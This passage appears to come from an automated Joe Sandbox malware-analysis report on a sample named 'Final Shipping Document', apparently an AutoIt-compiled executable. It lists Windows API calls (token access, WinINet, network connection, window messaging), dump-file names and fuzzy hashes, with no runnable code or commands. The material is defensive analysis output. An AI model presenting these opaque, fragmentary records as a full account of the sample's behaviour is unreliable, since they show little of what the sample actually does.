                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                            • String ID:
                                                            • API String ID: 1539411459-0
                                                            • Opcode ID: d9c9373388bdf2cea086e0ad96db27897078d0799bb066647faee617e0b802b9
                                                            • Instruction ID: cb04907acd1de4c003d39435b199a5d88053c01d3bf1a17d706b81b102169c1f
                                                            • Opcode Fuzzy Hash: d9c9373388bdf2cea086e0ad96db27897078d0799bb066647faee617e0b802b9
                                                            • Instruction Fuzzy Hash: 4AF03A36055658BADB126F98AC09FCE3B69AF06710F048000FB12750E2C7B55651DBA5
                                                            APIs
                                                            • GetSysColor.USER32(00000008), ref: 00BB98CC
                                                            • SetTextColor.GDI32(?,?), ref: 00BB98D6
                                                            • SetBkMode.GDI32(?,00000001), ref: 00BB98E9
                                                            • GetStockObject.GDI32(00000005), ref: 00BB98F1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Color$ModeObjectStockText
                                                            • String ID:
                                                            • API String ID: 4037423528-0
                                                            • Opcode ID: 09848b27196b1ca2b084e286c1bfa038ee74779f33d45d4e4fa20c39bfb30433
                                                            • Instruction ID: b68195b43489252511bda0ed74c57f76570a7fc7e9d3bebc020e2ac3b7fe46db
                                                            • Opcode Fuzzy Hash: 09848b27196b1ca2b084e286c1bfa038ee74779f33d45d4e4fa20c39bfb30433
                                                            • Instruction Fuzzy Hash: BDE06531254244AEDB215B74AC49BEC3F60EB11335F048259F7F5650E1C7714644AB10
                                                            APIs
                                                            • GetCurrentThread.KERNEL32 ref: 00C01634
                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,00C011D9), ref: 00C0163B
                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C011D9), ref: 00C01648
                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,00C011D9), ref: 00C0164F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CurrentOpenProcessThreadToken
                                                            • String ID:
                                                            • API String ID: 3974789173-0
                                                            • Opcode ID: 74efa4270091606be8100f6f508a2d9658c1cb9f7382123b06c7f536d7a5b27f
                                                            • Instruction ID: cf4c3348cc1877c5daed7b1877e49d3afe94742b7e078e3abac7f937259ec3c1
                                                            • Opcode Fuzzy Hash: 74efa4270091606be8100f6f508a2d9658c1cb9f7382123b06c7f536d7a5b27f
                                                            • Instruction Fuzzy Hash: 0DE08C32612211EBD7201FA0AE8DB8F7B7CEF447A2F188808F655E9090E7358544CB60
                                                            APIs
                                                            • GetDesktopWindow.USER32 ref: 00BFD858
                                                            • GetDC.USER32(00000000), ref: 00BFD862
                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00BFD882
                                                            • ReleaseDC.USER32(?), ref: 00BFD8A3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                            • String ID:
                                                            • API String ID: 2889604237-0
                                                            • Opcode ID: 7262bf3a4840767c1e63ca3cfeaf04fa468ab0ddfb5aa5f5ec1bef0ae7e0a18f
                                                            • Instruction ID: cb6f619aac62b18cbf8b7640cacc2efe2ad4cb9ae9ae08284dd15beed07017db
                                                            • Opcode Fuzzy Hash: 7262bf3a4840767c1e63ca3cfeaf04fa468ab0ddfb5aa5f5ec1bef0ae7e0a18f
                                                            • Instruction Fuzzy Hash: 53E0E5B1810204DFCB41AFA0D88976DBBF2AB08310F108049F856A7260C7398905AF40
                                                            APIs
                                                            • GetDesktopWindow.USER32 ref: 00BFD86C
                                                            • GetDC.USER32(00000000), ref: 00BFD876
                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00BFD882
                                                            • ReleaseDC.USER32(?), ref: 00BFD8A3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                            • String ID:
                                                            • API String ID: 2889604237-0
                                                            • Opcode ID: cb0364d3a3770563c6055c6cca38ad935e2a51238827ccb01190445c81d37970
                                                            • Instruction ID: dbdbc3563191a9768c86078632e61a9e83281ce22ffd3c1cb4049ece75dc3d20
                                                            • Opcode Fuzzy Hash: cb0364d3a3770563c6055c6cca38ad935e2a51238827ccb01190445c81d37970
                                                            • Instruction Fuzzy Hash: 95E012B1810200EFCB40AFA0D88D76DBFF1BB08310F108048F85AF7260CB389901AF40
                                                            APIs
                                                              • Part of subcall function 00BA7620: _wcslen.LIBCMT ref: 00BA7625
                                                            • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00C14ED4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Connection_wcslen
                                                            • String ID: *$LPT
                                                            • API String ID: 1725874428-3443410124
                                                            • Opcode ID: a1a6038c730af7b76d57b42ab58871a68530e28bf4db83a9dd9ea228fc66704e
                                                            • Instruction ID: d86817c19c2b9f8948324cd0fad8c0833a973262111e00f06d1de6643558f259
                                                            • Opcode Fuzzy Hash: a1a6038c730af7b76d57b42ab58871a68530e28bf4db83a9dd9ea228fc66704e
                                                            • Instruction Fuzzy Hash: F8915175A042049FCB18DF98C494EE9BBF1BF46304F198099E41A9F392D731EE86DB91
                                                            APIs
                                                            • __startOneArgErrorHandling.LIBCMT ref: 00BCE30D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ErrorHandling__start
                                                            • String ID: pow
                                                            • API String ID: 3213639722-2276729525
                                                            • Opcode ID: eaa165182c4134573245f3cd454d262ced0853cf536c95a1786993e1fa2b6902
                                                            • Instruction ID: de6120ff4715f0bac8d1289c299f3a3f8154be91922a9b84c457209922f2bc7a
                                                            • Opcode Fuzzy Hash: eaa165182c4134573245f3cd454d262ced0853cf536c95a1786993e1fa2b6902
                                                            • Instruction Fuzzy Hash: 84517BA1A4C201D7DB167714C942BFDABE8EB40740F6449EEF0A5863A9FF34CC859A46
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #
                                                            • API String ID: 0-1885708031
                                                            • Opcode ID: 61b41084eed88c0d8427b27c9c9bf2fc6c0aa823415ceda37bcd5dd8e7f48624
                                                            • Instruction ID: ac4c021884c078cf4735990cedd3997807001cdabe35f301a15e8e3288b7266a
                                                            • Opcode Fuzzy Hash: 61b41084eed88c0d8427b27c9c9bf2fc6c0aa823415ceda37bcd5dd8e7f48624
                                                            • Instruction Fuzzy Hash: CD510F7550424A9FDB15EF28C081AFE7BE4EF16310F2440E5E9A19B2E0DA74DD46CBA0
                                                            APIs
                                                            • Sleep.KERNEL32(00000000), ref: 00BBF2A2
                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00BBF2BB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemorySleepStatus
                                                            • String ID: @
                                                            • API String ID: 2783356886-2766056989
                                                            • Opcode ID: 31edefd3ff915d871abf4dc2b349ac77c0ba1ae147ee03559006b058ec49e055
                                                            • Instruction ID: 20a9d03745f036afe3067ad962ee0e52df544b37c577cc08a34bf989ab0a1279
                                                            • Opcode Fuzzy Hash: 31edefd3ff915d871abf4dc2b349ac77c0ba1ae147ee03559006b058ec49e055
                                                            • Instruction Fuzzy Hash: 4551237241C7449BD320AF10DC86BAFBBF8FB85300F81889DF199511A5EB718569CB66
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00C257E0
                                                            • _wcslen.LIBCMT ref: 00C257EC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper_wcslen
                                                            • String ID: CALLARGARRAY
                                                            • API String ID: 157775604-1150593374
                                                            • Opcode ID: bd9ec67f2070c2d95cdcce29aad87ecfd7b5b212cdcef0048493926ce8163813
                                                            • Instruction ID: 5f9e55dbcfaffabfd8b53fe8a4017276893b158f46b6d92c17cb1aa965e0f98b
                                                            • Opcode Fuzzy Hash: bd9ec67f2070c2d95cdcce29aad87ecfd7b5b212cdcef0048493926ce8163813
                                                            • Instruction Fuzzy Hash: 3B41E131E002199FCB04DFA9D8819FEBBF4FF59324F104069E415AB291E7B09E81CBA0
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00C1D130
                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C1D13A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CrackInternet_wcslen
                                                            • String ID: |
                                                            • API String ID: 596671847-2343686810
                                                            • Opcode ID: 4d7cbc6de79bdf7754114fc502bfe41fa4797ff51a9255fd7094403108070e93
                                                            • Instruction ID: 1c692efbab8562a6a57be018727d26126869ebc921a963636188c7974e26314d
                                                            • Opcode Fuzzy Hash: 4d7cbc6de79bdf7754114fc502bfe41fa4797ff51a9255fd7094403108070e93
                                                            • Instruction Fuzzy Hash: 90313E71D00219ABCF15EFA5CC85EEEBFB9FF06350F100059F825A6161D735AA46DB60
                                                            APIs
                                                            • DestroyWindow.USER32(?,?,?,?), ref: 00C33621
                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00C3365C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$DestroyMove
                                                            • String ID: static
                                                            • API String ID: 2139405536-2160076837
                                                            • Opcode ID: d0efb8c326343408af56ac1c7b74845faff47c279ecd37286ecb56398b3795d6
                                                            • Instruction ID: ef2808cdfc1f5453755a7530b46a9b1b97ff1d7d7888187d3c0f755383a8ff3a
                                                            • Opcode Fuzzy Hash: d0efb8c326343408af56ac1c7b74845faff47c279ecd37286ecb56398b3795d6
                                                            • Instruction Fuzzy Hash: F9318B71120244AEDB209F28DC81FFB73B9FF88724F009619F9A5D7290DA35AE91D760
                                                            APIs
                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00C3461F
                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C34634
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: '
                                                            • API String ID: 3850602802-1997036262
                                                            • Opcode ID: 18cb2abcc48e4c245cc59fe9d363151cee6d7dcb3d8d4bc5ebd6aa2140b24571
                                                            • Instruction ID: 19423df43a5da8749fa41ae678531598305918ae0017ba468f61fc4b6ab622ab
                                                            • Opcode Fuzzy Hash: 18cb2abcc48e4c245cc59fe9d363151cee6d7dcb3d8d4bc5ebd6aa2140b24571
                                                            • Instruction Fuzzy Hash: B5311874E013099FDB18CFA9C991BDABBB5FF49300F14406AE915AB351D770AA41CF90
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C3327C
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C33287
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: Combobox
                                                            • API String ID: 3850602802-2096851135
                                                            • Opcode ID: e063a266226d33306fef1be75ab095430242b1787fadf854ff006d97a357c14e
                                                            • Instruction ID: c45383a4a841630c55fe29535690acf7b1e41f85930f9f90d29e4fe7c52c8698
                                                            • Opcode Fuzzy Hash: e063a266226d33306fef1be75ab095430242b1787fadf854ff006d97a357c14e
                                                            • Instruction Fuzzy Hash: FE11C4717102487FFF259F54DC81FBB376AEB94364F104228F9289B292D6729E518B60
                                                            APIs
                                                              • Part of subcall function 00BA600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00BA604C
                                                              • Part of subcall function 00BA600E: GetStockObject.GDI32(00000011), ref: 00BA6060
                                                              • Part of subcall function 00BA600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BA606A
                                                            • GetWindowRect.USER32(00000000,?), ref: 00C3377A
                                                            • GetSysColor.USER32(00000012), ref: 00C33794
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                            • String ID: static
                                                            • API String ID: 1983116058-2160076837
                                                            • Opcode ID: 5353270f429e1674d2b0f128d1eeb527ef35d2c46b96210f32a9d6eae35d3b2e
                                                            • Instruction ID: 9cbc42664de393e9b1be210ffab410747afeac5e34ce3c031ce44f521df7b483
                                                            • Opcode Fuzzy Hash: 5353270f429e1674d2b0f128d1eeb527ef35d2c46b96210f32a9d6eae35d3b2e
                                                            • Instruction Fuzzy Hash: 421129B2620209AFDF10DFA8CD46AEE7BB8EB09314F014514F965E2250D735E9519B50
                                                            APIs
                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C1CD7D
                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C1CDA6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Internet$OpenOption
                                                            • String ID: <local>
                                                            • API String ID: 942729171-4266983199
                                                            • Opcode ID: b079c6238524cdbacfacac2f809ce7d9fbddd66dfe078ee562d29eb5d8802666
                                                            • Instruction ID: b8f18db571025650feec05b1fbc83d7d8e2be1e7cf3eb54a624f9f803c80dbaa
                                                            • Opcode Fuzzy Hash: b079c6238524cdbacfacac2f809ce7d9fbddd66dfe078ee562d29eb5d8802666
                                                            • Instruction Fuzzy Hash: 9F11E371281631BAD7345B669CC4FE7BE68EB137A4F004226F11992180D2609990E6F0
                                                            APIs
                                                            • GetWindowTextLengthW.USER32(00000000), ref: 00C334AB
                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00C334BA
                                                            Strings
                                                            Similarity
                                                            • API ID: LengthMessageSendTextWindow
                                                            • String ID: edit
                                                            • API String ID: 2978978980-2167791130
                                                            • Opcode ID: 192a17871c7fef428afafb6d11f707949065668db80bae8b5ba85f6f27a8dd0f
                                                            • Instruction ID: cfa5176d2bbb5b593207d0392f45fb870b97d01f7c2784c3d8146737b76cc508
                                                            • Instruction Fuzzy Hash: D8118F71120248ABEB224F64DC84BAB3B6AEB05374F504724F975A71E0C771DE919B50
                                                            APIs
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                            • CharUpperBuffW.USER32(?,?,?), ref: 00C06CB6
                                                            • _wcslen.LIBCMT ref: 00C06CC2
                                                            Strings
                                                            Similarity
                                                            • API ID: _wcslen$BuffCharUpper
                                                            • String ID: STOP
                                                            • API String ID: 1256254125-2411985666
                                                            • Opcode ID: c9d6fec1bd8e287e72d9030ccefbc6da1886df53135bbf84d1457e114be23ac8
                                                            • Instruction ID: 5bff93f2684dfd0b375782f5e4ce7977bcdfe2bced1647412741f179903a47f5
                                                            • Instruction Fuzzy Hash: AE01D232A146368BDB20AFFDDC81ABF77F5EB61710B100529E862971D0EB31DA60C650
                                                            APIs
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                              • Part of subcall function 00C03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C03CCA
                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C01D4C
                                                            Strings
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_wcslen
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 624084870-1403004172
                                                            • Opcode ID: f7370b6b4b3f0e7381a4c0ec9ed2d2c038cb3578f7c182f881e50727d872d727
                                                            • Instruction ID: 061ec5e997d9d1d7b9f20a900aae17b42b19778aae81aa6607840c1fc3d1dc49
                                                            • Instruction Fuzzy Hash: 3701D471605228ABCB19EBA4CC51DFEB3A8EB473A0B180619FC32672C1EA305908D760
                                                            APIs
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                              • Part of subcall function 00C03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C03CCA
                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00C01C46
                                                            Strings
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_wcslen
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 624084870-1403004172
                                                            • Opcode ID: 1ad00919a984cb54e9b217c676556d30a560769f7dcb75b6919ed9f88783d3e7
                                                            • Instruction ID: f1ffbc064279bb18975db05bbdc6b1c308cfab6e3af4a49180d5f0c1df5c0162
                                                            • Instruction Fuzzy Hash: 7C01A77568510467DB18EB90C952AFFB7E8DB52380F140019B816772C1EA24DF48D6B1
                                                            APIs
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                              • Part of subcall function 00C03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C03CCA
                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00C01CC8
                                                            Strings
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_wcslen
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 624084870-1403004172
                                                            • Opcode ID: f11682c51633324d01dea431ad177a0f281957e53a6d91d5c7a4b02e54df79cc
                                                            • Instruction ID: a5e7d2cf3045f26952dc37a8d28546ea72473b91310dc4ea65cdf479de039b12
                                                            • Instruction Fuzzy Hash: BD018675695128A7EF14EBA5CA52AFEB7EC9B12380F180015BC12B32C1EA65DF08D671
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: 3, 3, 16, 1
                                                            • API String ID: 176396367-3042988571
                                                            • Opcode ID: 7647b379bdf81c8e697a12c3ca45a3963484305817183a91d74d873492be5428
                                                            • Instruction ID: c7b9243e2adfc6af99938ebea4e0ee49202cef8efdca019843c726be3936bd17
                                                            • Instruction Fuzzy Hash: 3FE02B026043301492313279BCC1EBF56C9CFC5750710193FF981C2266EBE48F9193A0
                                                            APIs
                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C00B23
                                                            Strings
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID: AutoIt$Error allocating memory.
                                                            • API String ID: 2030045667-4017498283
